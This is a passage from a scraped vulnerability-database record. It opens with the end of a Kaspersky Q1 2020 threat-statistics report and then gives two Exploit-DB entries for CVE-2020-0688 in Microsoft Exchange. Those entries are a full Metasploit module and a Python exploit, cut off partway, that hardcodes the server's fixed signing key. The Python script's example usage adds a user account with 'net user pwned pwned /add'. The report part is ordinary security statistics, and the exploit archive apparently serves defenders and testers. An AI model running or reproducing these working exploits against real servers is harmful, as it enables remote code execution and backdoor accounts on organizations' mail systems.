percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 | \n2 | Zbot | Trojan.Win32.Zbot | 20.8 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 | \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 | \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 | \n6 | Trickster | Trojan.Win32.Trickster | 3.6 | \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 | \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 | \n \n_* Unique users attacked by this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. 
Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n \n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 | \n4 | 
GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 | \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.96 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n \n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were 
attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.\n\nIn second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. 
Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. 
This vulnerability enables the use of fake certificates that the system recognizes as legitimate.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.\n\nVarious network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol. It leads to remote code execution, and the attacker does not even need to know the username/password combination, since the error occurs before the authentication stage; however, it is present only in Windows 10. Two critical vulnerabilities were found in Remote Desktop Gateway ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)), enabling an unauthorized user to execute remote code in the target system. 
In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet users' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers _**_Malware-class_**_ local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally 
faced at least one **Malware**-class local threat during Q1.", "modified": "2020-05-20T10:00:43", "published": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2020-03-05T13:38:14", "description": "", "published": "2020-03-05T00:00:00", "type": "exploitdb", "title": "Exchange Control Panel - Viewstate Deserialization (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-05T00:00:00", "id": "EDB-ID:48168", "href": "https://www.exploit-db.com/exploits/48168", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. 
With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def 
generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: 
https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: 
viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48168"}, {"lastseen": "2020-03-02T07:43:23", "description": "", "published": "2020-03-02T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "EDB-ID:48153", "href": "https://www.exploit-db.com/exploits/48153", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Date: 2020-02-28\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: 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\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('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')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + 
len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] 
Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. 
net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? 
